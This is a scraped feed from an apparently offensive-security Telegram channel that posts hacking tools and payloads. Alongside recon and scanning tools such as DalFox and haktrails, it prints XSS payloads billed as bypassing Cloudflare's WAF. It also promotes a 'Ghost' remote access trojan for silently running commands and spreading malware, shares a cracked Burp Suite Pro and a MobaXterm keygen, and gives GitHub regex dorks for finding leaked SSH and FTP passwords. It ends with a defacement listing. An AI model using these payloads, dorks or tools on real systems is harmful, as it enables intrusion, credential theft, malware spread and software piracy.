NEW BOT Телеграм, страница

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

❤33⚡1

1.04K views14:36

🕷 ExifTool 🕷

💬

Image::ExifTool is a customizable set of Perl modules plus a full-featured command-line application called exiftool for reading and writing meta information in a wide variety of files, including the maker note information of many digital cameras by various manufacturers such as Canon, Casio, DJI, FLIR, FujiFilm, GE, HP, JVC/Victor, Kodak, Leaf, Minolta/Konica-Minolta, Nikon, Nintendo, Olympus/Epson, Panasonic/Leica, Pentax/Asahi, Phase One, Reconyx, Ricoh, Samsung, Sanyo, Sigma/Foveon and Sony.

📊

The following modules/packages are recommended for specific features, e.g. decoding compressed and/or encrypted information from the indicated file types, calculating digest values for some information types, etc.:

⚪️ Archive::Zip / libarchive-zip-perl: ZIP, DOCX, PPTX,
XLSX, ODP, ODS, ODT, EIP, iWork

⚪️ Unicode::LineBreak / libunicode-linebreak-perl: for column-alignment of alternate language output

⚪️ POSIX::strptime / libposix-strptime-perl: for inverse date/time conversion

⚪️ Time::Piece (in perl core): alternative to POSIX::strptime

⚪️ IO::Compress::RawDeflate + IO::Uncompress::RawInflate (in perl core): for reading FLIF images

⚪️ Compress::Raw::Lzma / libcompress-raw-lzma-perl: for reading encoded 7z files

⚪️ IO::Compress::Brotli + IO::Uncompress::Brotli / libio-compress-brotli-perl: for writing/reading compressed JXL metadata

🔼 Install:
👩‍💻 Kali:

sudo apt install libimage-exiftool-perl

⬇️

🔟

👩‍💻

🔒

BugCod3

#Steghide #Tools

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

3⚡1❤1

1.04K views16:38

🦊

DalFox

🦊

💬

DalFox is a powerful open-source tool that focuses on automation, making it ideal for quickly scanning for XSS flaws and analyzing parameters. Its advanced testing engine and niche features are designed to streamline the process of detecting and verifying vulnerabilities.

🔼 Install:

go install github.com/hahwul/dalfox/v2@latest

💻 Usage:

dalfox [mode] [target] [flags]

👤 Single target mode:

dalfox url http://testphp.vulnweb.com/listproducts.php\?cat\=123\&artist\=123\&asdf\=ff \
  -b https://your-callback-url

👥 Multiple target mode from file:

dalfox file urls_file --custom-payload ./mypayloads.txt

🪟 Pipeline mode:

cat urls_file | dalfox pipe -H "AuthToken: bbadsfkasdfadsf87"

😸

Github

⬇️

Donwload

🔒

BugCod3

#Go #XSS #Scanner #Vulnerability #BugBounty

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

3⚡1❤1👍1

917 views15:37

Cloudflare bypass XSS payloads

Tested On: 👩‍💻

XSS Payloads:

for(t?c.outerHTmL=o:i=o=’’;i++<1024;o+=`<code onclick=this.innerHTmL=’${M(i)?’*’:n||’·’}’>#</code>${i%64?’’:’<p>’}`)for(n=j=0;j<9;n+=M(i-65+j%3+(j++/3|0)*64))M=i=>i>64&i<960&i%64>1&C(i*i)>.7
javanoscript:{alert ‘0’ }
≋ "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain) //># ≋
<noscript/OnLoad="`${prompt``}`">

#Exploit #XSS #Payload

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

👍33⚡2❤2

1.08K views15:47

New xss payload to bypass cloudflare WAF

<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>

#XSS #Payload #Bypass #CF #WAF

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

4❤2⚡1🍾1

936 views07:41

👣

haktrails

👣

💬

haktrails is a Golang client for querying SecurityTrails API data, sponsored by SecurityTrails.

📊 Tool Features:
⚪️ stdin input for easy tool chaining
⚪️ subdomain discovery
⚪️ associated root domain discovery
⚪️ associated IP discovery
⚪️ historical DNS data
⚪️ historical whois data

⚪️

DSL queries (currently a prototype)
⚪️ company discovery (discover the owner of a domain)
⚪️ whois (returns json whois data for a given domain)
⚪️ ping (check that your current SecurityTrails configuration/key is working)
⚪️ usage (check your current SecurityTrails usage)
⚪️ "json" or "list" output options for easy tool chaining
⚪️ "ZSH & Bash autocompletion"

🔼 Installation:

go install -v github.com/hakluke/haktrails@latest

💻 Usage:

Gather subdomains

cat domains.txt | haktrails subdomains
echo "yahoo.com" | haktrails subdomains

and...

😸

Github

⬇️

🔒

BugCod3

#Go #Subdomain #IP #Discovery

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

2⚡1❤1🔥1

1.03K viewsedited 12:03

Main sinks that can lead to DOM-XSS

#Javacript #Dom #XSS

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

3⚡1❤1👍1

911 views13:14

🦎

Subprober

🦎

🔔 Subprober v1.0.5 - Fast Probing Tool for Penetration Testing

👁‍🗨 Overview:
Subprober v1.0.5 is a powerful and efficient tool designed for penetration testers and security professionals. This release introduces several enhancements, bug fixes, and new features to elevate your subdomain probing experience. Subprober facilitates fast and reliable information extraction, making it an invaluable asset for penetration testing workflows.

📊 Features:
⚪️ Subprober Concurrency and Accuracy are Improved with libraries like aiohttp,asyncio
⚪️ Subprober Error handling and Synchronization are improved
⚪️ Resolved some Bugs for Subprober
⚪️ Subprober Commands are changed with usefull flags
⚪️ Resolved executive errors in v1.0.4
⚪️ Subprober requires python version 3.11.x

🔼 Installation:
Method 1:

pip install git+https://github.com/sanjai-AK47/Subprober.git

Method 2:

cd Subprober
pip install .

💻 Basic Usage:

subprober -f subdomains.txt -o output.txt -tl -wc -sv  -apt -wc -ex 500 -v -o output.txt -c 20

😸

Github

⬇️

🔒

BugCod3

#Subdomains #Scanner

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

❤22⚡1👍1

967 views14:46

👻

Ghost

👻

👻 RAT (Remote Access Trojan) - Silent Botnet - Full Remote Command-Line Access - Download & Execute Programs - Spread Virus' & Malware

💬

ghost is a light RAT that gives the server/attacker full remote access to the user's command-line interpreter (cmd.exe). They are allowed to execute commands silently without the client/zombie noticing. The server/attacker is also given the ability to download and execute files on the client/zombie's computer. This is also a silent and hidden process. Like most Remote Access Trojans, this download and execution ability helps distribute viruses and other pieces of malware.

👁‍🗨

This malware is distributed simply by running zombie.exe. This file name can be changed to whatever. There is no restriction. When run, it searches for the first two arguments (IP & Port). If neither is provided, the program doesn't run. With that being said, make sure you provide the server's IP and Port in the command-line arguments. Example:

zombie.exe 127.0.0.1 27015

📊 Features:
⚪️ Remote command execution
⚪️ Silent background process
⚪️ Download and run file (Hidden)
⚪️ Safe Mode startup
⚪️ Will automatically connect to the server
⚪️ Data sent and received is encrypted (substitution cipher)
⚪️ Files are hidden
⚪️ Installed Antivirus shown to server
⚪️ Easily spread malware through download feature
⚪️ Startup info doesn't show in msconfig or other startup checking programs like CCleaner
⚪️ Disable Task Manager

😸

Github

⬇️

🔒

BugCod3

#Rat #Malware #Remote #Access

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

👍33⚡1❤1

1.93K views16:38

🕷

hakip2host

🕷

💬

hakip2host takes a list of IP addresses via stdin, then does a series of checks to return associated domain names.

📊 Current supported checks are:
⚪️ DNS PTR lookups
⚪️ Subject Alternative Names (SANs) on SSL certificates
⚪️ Common Names (CNs) on SSL certificates

🔼 Installation:

go install github.com/hakluke/hakip2host@latest

💻

Usage:

hakip2host --help

😸

Github

⬇️

🔒

BugCod3

#Osint #Recon #CIDR #HTTPS

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

4⚡1❤1👍1

1.23K views19:41

👁 Burpsuite Pro 👁

📂 README (en+ru) included, plz read it before run BS.

🔼 Run with Java 18 (JDK for Win included)

⬇️

🔒

311138

#Burpsuite #Pro #Tools

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

4⚡1❤1

1.12K views16:38

🌐

Bypass login authentication

🌐

⬇️

🔒

BugCod3

#Bypass #Login #Page #Authentication

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

7❤‍🔥2⚡1❤1👍1

1.05K views18:40

🫥

MobaXterm Keygen

🔘

⚠️ Please see source code. It is not complex. ⚠️

I don't know how to make custom settings take effect in Customizer mode directly.

💬

The only way I found is that you should export custom settings to a file named MobaXterm customization.custom which is also a zip file. Then merge two zip file: Custom.mxtpro and MobaXterm customization.custom to Custom.mxtpro. Finally copy newly-generated Custom.mxtpro to MobaXterm's installation path.

📊 Postnoscript:
⚪️ This application does not have complex activation algorithm and it is truly fantastic. So please pay for it if possible.

⚪️ The file generated, Custom.mxtpro, is actually a zip file and contains a text file, Pro.key, where there is a key string.

⚪️ MobaXterm.exe has another mode. You can see it by adding a parameter "-customizer".

./MobaXterm.exe -customizer

💻 Usage:

./MobaXterm-Keygen.py "DoubleSine" 10.9

😸

Github

⬇️

Donwload

🔒

BugCod3

#Python #MobaXterm #Keygen #Tools

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

6⚡1❤1

834 views18:40

The new cs.github.com search allows for regex, which means brand new regex GitHub Dorks are possible!

Eg, find SSH and FTP passwords via connection strings with:
/ssh:\/\/.*:.*@.*target\.com/
/ftp:\/\/.*:.*@.*target\.com/

#infosec #cybersecurite #bugbountytip

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

7⚡1❤1

751 views17:18

🔑 LEAKEY 🔑

LEAKEY is a bash noscript which checks and validates for leaked credentials. The idea behind LEAKEY is to make it highly customizable and easy to add checks for new services.

💬

LEAKEY is a tool is for validation of leaked API tokens/keys found during pentesting and Red Team Enegagments.
The noscript is really useful for Bug Hunters inorder to validate and determine the impact of leaked credentials.

LEAKEY uses a json based signature file located at ~/.leakey/signatures.json
The idea behind LEAKEY is to make it highly customizable and easy to add new services/checks once they are discovered.

LEAKEY loads the services/check list via the signature file, if you wish to add more Checks/services, simply append it in the signatures.json file

👤 Requirements:
⚪️ jq

🔼 Installation:

curl https://raw.githubusercontent.com/rohsec/LEAKEY/master/install.sh -o leaky_install.sh && chmod +x leaky_install.sh && bash leaky_install.sh

💻 Usage:
After running the installation command, simply run the below in your terminal

leaky

📊 Adding Checks:
All the checks for LEAKEY are defined in the signatures.json file.
To add any new checks, simply appened the signatures file at ~/.leakey/signatures.json

{
    "id": 0,
    "name": "Slack API Token",
    "args": [
      "token"
    ],
    "command": "curl -sX POST \"https://slack.com/api/auth.test?token=xoxp-$token&pretty=1\""
  }

😸

Github

⬇️

🔒

BugCod3

#RedTeam #BugHunter #Leaked #Tools

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

👍4❤22⚡1

802 views17:39

🕸

Site

👁‍🗨

Mirror-h

Country: 🇺🇸

#Deface

➖

📣

📣

T.me/LearnExploit

Please open Telegram to view this post

VIEW IN TELEGRAM

❤4⚡1🔥1

692 views13:08